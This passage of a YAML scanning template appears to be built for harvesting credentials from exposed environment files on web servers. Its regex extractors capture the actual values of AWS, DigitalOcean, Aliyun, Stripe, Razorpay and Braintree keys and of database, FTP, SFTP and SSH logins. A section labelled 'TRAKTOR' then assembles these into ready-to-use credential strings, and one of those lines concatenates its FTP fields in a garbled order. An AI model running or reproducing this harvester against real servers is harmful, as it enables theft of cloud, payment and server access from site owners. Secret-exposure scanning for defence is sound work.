        internal: true       
        group: 2
        regex:
          - "(?mi)^\\s*#?(MONGO_DB|MONGO)_PORT\\s*[=:]\\s*([^\\s]+)\\s*$"

      - type: regex
        part: body
        name: mongo_name
        internal: true       
        group: 3
        regex:
          - "(?mi)^\\s*#?(MONGO_DB|MONGO)_(DATABASE|NAME)\\s*[=:]\\s*([^\\s]+)\\s*$"  

      - type: regex
        part: body
        name: mongo_user
        internal: true       
        group: 3
        regex:
          - "(?mi)^\\s*#?(MONGO_DB|MONGO)_(USER|USERNAME)\\s*[=:]\\s*([^\\s]+)\\s*$"

      - type: regex
        part: body
        name: mongo_password
        internal: true       
        group: 3
        regex:
          - "(?mi)^\\s*#?(MONGO_DB|MONGO)_(PASS|PASSWORD|PASSWD|ROOT_PASSWORD)\\s*[=:]\\s*([^\\s]+)\\s*$"          
#
      - type: regex
        part: body
        name: aws_key
        internal: true
        group: 2           
        regex:
          - "(?mi)^\\s*#?\\s*[=:]\\s*((A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})\\n(.*?)\\s*[=:]\\s*(.*?)\\$"

      - type: regex
        part: body
        name: aws_sec
        internal: true               
        group: 5
        regex:
          - "(?mi)^\\s*#?\\s*[=:]\\s*((A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})\\n(.*?)\\s*[=:]\\s*(.*?)\\$"

      - type: regex
        part: body
        name: aws_key1
        internal: true               
        group: 1
        regex:        
          - "(?mi)^\\s*#?AWS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_SNS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_S3_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_ACCESS_KEY_ID\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_ACCESS_KEY_ID_2\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?BACKUP_S3_ACCESS_KEY_ID\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?WAS_ACCESS_KEY_ID\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?WAS_SECRET_ACCESS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_TEXTRACT_KEY_ID\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_SES_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?SES_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_ACCESS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?S3_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?S3_ACCESS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"

      - type: regex
        part: body
        name: aws_sec1
        internal: true               
        group: 1
        regex:
          - "(?mi)^\\s*#?AWS_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_SNS_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_S3_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_SECRET_ACCESS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_SECRET_ACCESS_KEY_2\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?BACKUP_S3_SECRET_ACCESS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?WAS_SECRET_ACCESS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_TEXTRACT_KEY_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?SES_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_SES_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?AWS_SECRET_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?S3_PASSWORD\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?S3_ACCESS_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?S3_ACCESS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$" 

      - type: regex
        part: body
        name: oss_key
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?OSS_ACCESS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"      
          - "(?mi)^\\s*#?ALIYUN_SLS_ACCESS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"      
          - "(?mi)^\\s*#?OSS_ACCESS_KEY_ID\\s*[=:]\\s*([^\\s]+)\\s*$"      
          - "(?mi)^\\s*#?ALIYUNKEY\\s*[=:]\\s*([^\\s]+)\\s*$"                                    
      - type: regex
        part: body
        name: oss_sec
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?OSS_SECRET_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"          
          - "(?mi)^\\s*#?ALIYUN_SLS_ACCESS_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$"         
          - "(?mi)^\\s*#?OSS_ACCESS_KEY_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$"         
          - "(?mi)^\\s*#?ALIYUNSECRET\\s*[=:]\\s*([^\\s]+)\\s*$"                             
#
      - type: regex
        part: body
        name: do
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?DIGITALOCEAN_SPACES_KEY\\s*[=:]\\s*([^\\s]+)\\s*$" 
          - "(?mi)^\\s*#?DO_SPACES_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"  
          - "(?mi)^\\s*#?SPACES_KEY\\s*[=:]\\s*([^\\s]+)\\s*$" 
          - "(?mi)^\\s*#?SPACES_ACCESS_KEY_ID\\s*[=:]\\s*([^\\s]+)\\s*$"  
          - "(?mi)^\\s*#?STORAGE_DIGITALOCEAN_KEY\\s*[=:]\\s*([^\\s]+)\\s*$" 
          - "(?mi)^\\s*#?DO_ACCESS_KEY_ID\\s*[=:]\\s*([^\\s]+)\\s*$"  
          - "(?mi)^\\s*#?DIGITAL_OCEAN_API_KEY\\s*[=:]\\s*([^\\s]+)\\s*$" 
          - "(?mi)^\\s*#?SPACE_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"  
          - "(?mi)^\\s*#?CLOUD_ACCESS_KEY_ID\\s*[=:]\\s*([^\\s]+)\\s*$" 
          - "(?mi)^\\s*#?DOS_ACCESS_KEY_ID\\s*[=:]\\s*([^\\s]+)\\s*$"                                

#
      - type: regex
        part: body
        name: do_sec
        internal: true       
        group: 1
        regex:
          - "(?mi)^\\s*#?DIGITALOCEAN_SPACES_SECRET\\s*[=:]\\s*(.*?)\\$"
          - "(?mi)^\\s*#?DO_SPACES_SECRET\\s*[=:]\\s*(.*?)\\$"
          - "(?mi)^\\s*#?SPACES_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$" 
          - "(?mi)^\\s*#?SPACES_SECRET_ACCESS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"  
          - "(?mi)^\\s*#?STORAGE_DIGITALOCEAN_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$" 
          - "(?mi)^\\s*#?DO_SECRET_ACCESS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"  
          - "(?mi)^\\s*#?DIGITAL_OCEAN_API_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$" 
          - "(?mi)^\\s*#?CLOUD_SECRET_ACCESS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$" 
          - "(?mi)^\\s*#?DOS_SECRET_ACCESS_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"   

      - type: regex
        part: body
        name: stripe_key
        internal: true
        group: 2
        regex:
          - "(?mi)^\\s*#?STRIPE_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"  
          - "(?mi)^\\s*#?STRIPE_PUBLISH_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?STRIPE_PUB_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"                    

      - type: regex
        part: body
        name: stripe_sec
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?STRIPE_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?STRIPE_SECRET_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"
#          
      - type: regex
        part: body      
        name: aws_rds
        regex:
          - '[0-9a-z._-]+.rds.amazonaws.com'

      - type: regex
        part: body
        name: ftp_host
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?FTP_HOST\\s*[=:]\\s*([^\\s]+)\\s*$"  
          - "(?mi)^\\s*#?FTP_HOSTNAME\\s*[=:]\\s*([^\\s]+)\\s*$"  
      - type: regex
        part: body
        name: ftp_pass
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?FTP_PASS\\s*[=:]\\s*([^\\s]+)\\s*$"           
          - "(?mi)^\\s*#?FTP_PASSWORD\\s*[=:]\\s*([^\\s]+)\\s*$"  

      - type: regex
        part: body
        name: ftp_user
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?FTP_USER\\s*[=:]\\s*([^\\s]+)\\s*$"          
          - "(?mi)^\\s*#?FTP_USERNAME\\s*[=:]\\s*([^\\s]+)\\s*$"  

      - type: regex
        part: body
        name: ftp_port
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?FTP_PORT\\s*[=:]\\s*([^\\s]+)\\s*$"  

      - type: regex
        part: body
        name: sftp_host
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?SFTP_HOST\\s*[=:]\\s*([^\\s]+)\\s*$"  
          - "(?mi)^\\s*#?SFTP_HOSTNAME\\s*[=:]\\s*([^\\s]+)\\s*$"         

      - type: regex
        part: body
        name: sftp_pass
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?SFTP_PASS\\s*[=:]\\s*([^\\s]+)\\s*$"          
          - "(?mi)^\\s*#?SFTP_PASSWORD\\s*[=:]\\s*([^\\s]+)\\s*$"  

      - type: regex
        part: body
        name: sftp_user
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?SFTP_USER\\s*[=:]\\s*([^\\s]+)\\s*$"          
          - "(?mi)^\\s*#?SFTP_USERNAME\\s*[=:]\\s*([^\\s]+)\\s*$"  

      - type: regex
        part: body
        name: sftp_port
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?SFTP_PORT\\s*[=:]\\s*([^\\s]+)\\s*$"          

      - type: regex
        part: body
        name: ssh_host
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?SSH_HOST\\s*[=:]\\s*([^\\s]+)\\s*$"
          - "(?mi)^\\s*#?SSH_HOSTNAME\\s*[=:]\\s*([^\\s]+)\\s*$"
      - type: regex
        part: body
        name: ssh_pass
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?SSH_PASSWORD\\s*[=:]\\s*(.*?)\\$"
          - "(?mi)^\\s*#?SSH_PASS\\s*[=:]\\s*([^\\s]+)\\s*$"         

      - type: regex
        part: body
        name: ssh_user
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?SSH_USER\\s*[=:]\\s*([^\\s]+)\\s*$"         
          - "(?mi)^\\s*#?SSH_USERNAME\\s*[=:]\\s*(.*?)\\$"

      - type: regex
        part: body
        name: ssh_port
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?SSH_PORT\\s*[=:]\\s*([^\\s]+)\\s*$"   

      - type: regex
        part: body
        name: razor_key
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?RAZORPAY_KEY_LIVE\\s*[=:]\\s*([^\\s]+)\\s*$"   
          - "(?mi)^\\s*#?RAZORPAY_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"          
          - "(?mi)^\\s*#?RAZORPAY_KEY_ID\\s*[=:]\\s*([^\\s]+)\\s*$"                         

      - type: regex
        part: body
        name: razor_sec
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?RAZORPAY_SECRET_KEY_LIVE\\s*[=:]\\s*([^\\s]+)\\s*$"   
          - "(?mi)^\\s*#?RAZORPAY_SECRET_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"          
          - "(?mi)^\\s*#?RAZORPAY_KEY_SECRET\\s*[=:]\\s*([^\\s]+)\\s*$"  

      - type: regex
        part: body
        name: braintree_key
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?BRAINTREE_PUBLIC_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"

      - type: regex
        part: body
        name: braintree_sec
        internal: true
        group: 1
        regex:
          - "(?mi)^\\s*#?BRAINTREE_PRIVATE_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"

      - type: regex
        part: body
        name: brevo_key
        group: 1
        regex:
          - "(?mi)^\\s*#?BREVO_API_KEY\\s*[=:]\\s*([^\\s]+)\\s*$"

#
############# TRAKTOR ############       
#
      - type: dsl  # type of the extractor
        name: aws_leak
        dsl:
          - '"AWS_KEY=" + aws_key + "|AWS_SEC=" + aws_sec '
#
      - type: dsl  # type of the extractor
        name: aws_leak1
        dsl:
          - '"AWS_KEY=" + aws_key1 + "|AWS_SEC=" + aws_sec1 '
#
      - type: dsl  # type of the extractor
        name: do_leak
        dsl:
          - '"DO_KEY=" + do + "|DO_SEC=" + do_sec '
#
      - type: dsl
        name: db_cred
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + db_port + "|DB_USER=" +  db_user + "|DB_PASSWORD=" + db_password + "|DB_NAME=" + db_name'          
#
      - type: dsl
        name: oss_cred
        dsl:
          - '"OSS_KEY=" + oss_key + "|OSS_SEC=" + oss_sec'
#
      - type: dsl
        name: mongodb_cred
        dsl:
          - '"MONGO_HOST=" + mongo_host + "|MONGO_PORT=" + mongo_port + "|MONGO_USER=" +  mongo_user + "|MONGO_PASSWORD=" + mongo_password + "|MONGO_NAME=" + mongo_name'
#
      - type: dsl
        name: ftp_cred
        dsl:
          - '"FTP_HOST=" + "|FTP_PORT=" + ftp_port + ftp_host + "|FTP_USER=" + ftp_user + "|FTP_PASS=" + ftp_pass'
#
      - type: dsl
        name: ssh_cred
        dsl:
          - '"SSH_HOST=" + ssh_host + "|SSH_PORT=" + ssh_port + "|SSH_USER=" + ssh_user + "|SSH_PASS=" + ssh_pass'          
#
      - type: dsl
        name: sftp_cred
        dsl:
          - '"SFTP_HOST=" + sftp_host + "|SFTP_PORT=" + sftp_port + "|SFTP_USER=" + sftp_user + "|SFTP_PASS=" + sftp_pass'  

      - type: dsl
        name: razor_key
        dsl:       
          - '"RAZOR_KEY=" + razor_key + "|RAZOR_SECRET=" + razor_sec'
          
      - type: dsl
        name: braintree_key
        dsl:       
          - '"BRAIN_KEY=" + braintree_key + "|BRAIN_SEC=" + braintree_sec'      